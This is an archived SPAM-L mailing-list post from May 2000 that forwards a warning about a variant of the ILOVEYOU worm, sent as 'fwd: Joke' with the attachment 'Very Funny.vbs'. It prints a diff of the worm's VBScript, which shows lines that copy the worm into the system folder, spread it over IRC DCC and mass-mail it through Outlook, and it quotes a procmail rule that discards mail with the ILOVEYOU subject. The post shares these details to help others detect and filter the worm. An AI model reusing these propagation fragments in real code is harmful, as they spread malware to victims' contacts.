[Subject Prev][Subject Next][Thread Prev][Thread Next][Subject Index][Thread Index]

SPAM-L archives -- May 2000, week 1 (#197)

To: sureshr@xxxxxxxxxxxxxx, suresh@xxxxxxxxxxx, r.suresh@xxxxxxxxxxxxxxx
Subject: SPAM-L archives -- May 2000, week 1 (#197)
From: Smeagol Gollum <smeagol@xxxxxxxxxxxxxxxxxx>
Date: Thu, 4 May 2000 23:23:31 -0400 (EDT)

   [L-Soft(TM) logo] [L-Soft international]
     _________________________________________________________________
   
   Previous (more recent) message Next (less recent) message Previous
   (more recent) in topic Next (less recent) in topic Previous (more
   recent) by same author Next (less recent) by same author Previous page
   (May 2000, week 1) Back to main SPAM-L page Join or leave SPAM-L (or
   change settings) Reply Post a new message Search Proportional font
   Non-proportional font
   
Date:         Thu, 4 May 2000 20:02:23 -0300
Reply-To:     "Norman L. DeForest" <af380@xxxxxxxxxxxxxx>
Sender:       Spam Prevention Discussion List <SPAM-L@xxxxxxxxxxxxxxxxxxxx>
From:         "Norman L. DeForest" <af380@xxxxxxxxxxxxxx>
Subject:      Re: BLOCK: I LOVE YOU virus - It has mutated,
              new subject and file, name: "fwd: Joke" and "Very Funny.vbs"
In-Reply-To:  <Pine.BSF.4.10.10005041544240.53643-100000@xxxxxxxxxxxxxx>
Content-Type: TEXT/PLAIN; charset=US-ASCII

Forwarded to me from someone on the technical team here.

---------- Forwarded message ----------
Date: Thu, 4 May 2000 15:41:09 -0700
From: Andrew Edelstein <andrew@xxxxxxxxxxxxxx>
To: procmail@xxxxxxxxxxxxxxxxxxxxxxxxx
Subject: Re: IL0VEY0U has mutated

On Thu, May 04, 2000 at 03:26:05PM -0700, Andrew Edelstein wrote:
> Heads up: our worm of the day has mutated into a new version:
> Same trojan, only now the subject says "fwd: Joke" and the body is empty.
The
> attached file is named "Very Funny.vbs"

Thought I'd share the love <eg>, since I've already had a couple of people
ask me for it. Here's a diff of the attached file:


bash-2.03$ diff LOVE-LETTER-FOR-YOU.TXT.vbs Very\ Funny.vbs
25c25
< c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
---
> c.Copy(dirsystem&"\Very Funny.vbs")
118c118
< scriptini.WriteLine "n2=  /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
---
> scriptini.WriteLine "n2=  /.dcc send $nick "&dirsystem&"\Very Funny.HTM"
185,187c185,187
< male.Subject = "ILOVEYOU"
< male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
< male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
---
> male.Subject = "fwd: Joke"
> male.Body = vbcrlf&""
> male.Attachments.Add(dirsystem&"\Very Funny.vbs")
266c266
< set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
---
> set b=fso.CreateTextFile(dirsystem+"\Very Funny.HTM")
268c268
< set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
---
> set d=fso.OpenTextFile(dirsystem+"\Very Funny.HTM",2)
274c274
< end sub
\ No newline at end of file
---
> end sub

And their cksums:
1912960623 10034 LOVE-LETTER-FOR-YOU.TXT.vbs
1550212417 9931 Very Funny.vbs

--
Andrew Edelstein                http://andrew.pure-chaos.com

"I'm getting off right now!"
                                Sarah, 07/24/1999
     _________________________________________________________________
   
   Back to: Top of message | Previous page | Main SPAM-L page
     _________________________________________________________________
   
   [lpowered.gif] [catalist.gif] [EASE-generic-narrow.gif] Back to the
   index page.

Suresh Ramasubramanian   sureshr@xxxxxxxxxxxxxx


> -----Original Message-----
> From:	Sthitaprajna [SMTP:sthitaprajna@xxxxxxxxxxxxxxx]
> Sent:	Friday, May 05, 2000 5:00 PM
> To:	linux-india-general@xxxxxxxxxxxxxxxxxxxxx
> Subject:	[LIG] Re: IL0VEY0U worm [CERT Advisory CA-2000-04]
> 
> 
> 
>    :0 D
>    * ^Subject:[[tab] ]+ILOVEYOU
>    /dev/null
>

Prev by Subject: Re: SPAM
Next by Subject: SuSE Security Announcement - aaa_base - UPDATE
Previous by thread: SuSE Security Announcement - aaa_base - UPDATE
Next by thread: ILOVEYOU worm
Index(es):
- Subject
- Thread